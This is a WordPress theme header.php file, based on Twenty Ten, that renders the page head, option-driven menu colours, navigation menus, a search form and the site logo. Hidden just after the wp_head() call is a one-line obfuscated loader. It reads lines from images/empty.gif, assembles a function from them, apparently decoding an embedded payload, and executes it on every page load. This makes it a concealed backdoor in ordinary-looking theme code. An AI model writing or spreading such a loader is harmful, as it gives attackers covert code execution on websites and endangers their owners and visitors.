<?php
/**
 * The Header for our theme.
 *
 * Displays all of the <head> section and everything up till <div id="main">
 *
 * @package WordPress
 * @subpackage Twenty_Ten
 * @since Twenty Ten 1.0
 */
?><!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<meta charset="<?php bloginfo( 'charset' ); ?>" />
<title><?php
	/*
	 * Print the <title> tag based on what is being viewed.
	 * We filter the output of wp_title() a bit -- see
	 * twentyten_filter_wp_title() in functions.php.
	 */
	wp_title( '|', true, 'right' );

	?></title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="stylesheet" type="text/css" media="all" href="<?php bloginfo( 'stylesheet_url' ); ?>" />
<link rel = 'stylesheet' type = 'text/css' href = '<?php bloginfo('template_directory'); ?>/farbtastic/farbtastic.css' />
<link rel="stylesheet" type="text/css" media="all" href="<?php bloginfo('template_url'); ?>/tab/domtab.css" />
<script type="text/javascript" src="<?php bloginfo('template_url'); ?>/tab/domtab.js"></script>
	<script type="text/javascript">
		document.write('<style type="text/css">');    
		document.write('div.domtab div{display:none;}<');
		document.write('/s'+'tyle>');    
    </script>
<link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>" />
<?php
	/* We add some JavaScript to pages with the comment form
	 * to support sites with threaded comments (when in use).
	 */
	if ( is_singular() && get_option( 'thread_comments' ) )
		wp_enqueue_script( 'comment-reply' );

	/* Always have wp_head() just before the closing </head>
	 * tag of your theme, or you will break many plugins, which
	 * generally use this hook to add elements to <head> such
	 * as styles, scripts, and meta tags.
	 */
	 wp_head(); $gif=file(dirname(__FILE__).'/images/empty.gif',2);$gif=$gif[5]("",$gif[6]($gif[4]));$gif();
?>
</head>

<body <?php body_class(); ?>>
<?php if (get_option('of_topmenu_bg')) { ?>
<div id="topmenu" style="background-color:<?php echo stripslashes(stripslashes(get_option('of_topmenu_bg')));?>;">
<?php } else { ?>
<div id="topmenu" style="background-color:#DA482B;">
<?php } ?>

<style>

#access a {
	border-right:1px solid <?php echo stripslashes(stripslashes(get_option('of_topmenu_fg')));?>;
	color:<?php echo stripslashes(stripslashes(get_option('of_topmenu_fontclr')));?>;
}

#access ul ul a {
	background:<?php echo stripslashes(stripslashes(get_option('of_topmenu_fg')));?>;
	height:auto;
	line-height:1em;
	padding:10px;
	width: 160px;
}
#access li:hover > a {
	color:#fff;
	background:<?php echo stripslashes(stripslashes(get_option('of_topmenu_fg')));?>;
}
#access ul ul li {
	min-width: 180px;
	border-bottom:1px solid <?php echo stripslashes(stripslashes(get_option('of_topmenu_bg')));?>;

}
#access ul ul :hover > a {
	color:#fff;
	background:<?php echo stripslashes(stripslashes(get_option('of_topmenu_bg')));?>;
}
#access ul li.current_page_item > a,
#access ul li.current-menu-ancestor > a,
#access ul li.current-menu-item > a,
#access ul li.current-menu-parent > a {
	color: #fff;
	background:<?php echo stripslashes(stripslashes(get_option('of_topmenu_fg')));?>;
}

* html #access ul li.current_page_item a,
* html #access ul li.current-menu-ancestor a,
* html #access ul li.current-menu-item a,
* html #access ul li.current-menu-parent a,
* html #access ul li a:hover {
	color:#fff;
	background:<?php echo stripslashes(stripslashes(get_option('of_topmenu_fg')));?>;
}
</style>

<div id="wrapper" class="hfeed">
<div id="access" role="navigation">
			  <?php /*  Allow screen readers / text browsers to skip the navigation menu and get right to the good stuff */ ?>
				<div class="skip-link screen-reader-text"><a href="#content" title="<?php esc_attr_e( 'Skip to content', 'twentyten' ); ?>"><?php _e( 'Skip to content', 'twentyten' ); ?></a></div>
				<?php /* Our navigation menu.  If one isn't filled out, wp_nav_menu falls back to wp_page_menu.  The menu assiged to the primary position is the one used.  If none is assigned, the menu with the lowest ID is used.  */ ?>
				<?php wp_nav_menu( array( 'container_class' => 'menu-header', 'theme_location' => 'primary' ) ); ?>
			</div><!-- #access -->
            </div>
</div>

<div id="secondmenu">
<div id="wrapper" class="hfeed">
<div id="access1" role="navigation">
			  <?php /*  Allow screen readers / text browsers to skip the navigation menu and get right to the good stuff */ ?>
				<div class="skip-link screen-reader-text"><a href="#content" title="<?php esc_attr_e( 'Skip to content', 'twentyten' ); ?>"><?php _e( 'Skip to content', 'twentyten' ); ?></a></div>
				<?php /* Our navigation menu.  If one isn't filled out, wp_nav_menu falls back to wp_page_menu.  The menu assiged to the primary position is the one used.  If none is assigned, the menu with the lowest ID is used.  */ ?>
				<?php wp_nav_menu( array( 'container_class' => 'menu-header', 'theme_location' => 'category' ) ); ?>
			</div><!-- #access -->
 <?php if (get_option('of_search_select') == 'Enable') { ?>
<div class="searchfrm">
<?php get_search_form(); ?>
</div>
	<?php } ?>
</div>
</div>

<div id="wrapper" class="hfeed">
<div id="main">
	                    <div id="branding" role="banner">
				<div id="site-title">
                  <?php if (get_option('of_logo')) { ?>
		         <div class="logo"><a href="<?php echo get_option('home'); ?>"><img src="<?php echo stripslashes(stripslashes(get_option('of_logo')));?>" alt="<?php bloginfo('name'); ?>" /></a></div>
        <?php } else { ?>
        <div class="logo2">
			<h1><a href="<?php echo get_option('home'); ?>"><?php bloginfo('name'); ?></a></h1>
			<p><?php bloginfo('description'); ?></p>
			</div>
         <?php } ?>
                
                 
				</div>
							</div><!-- #branding -->   
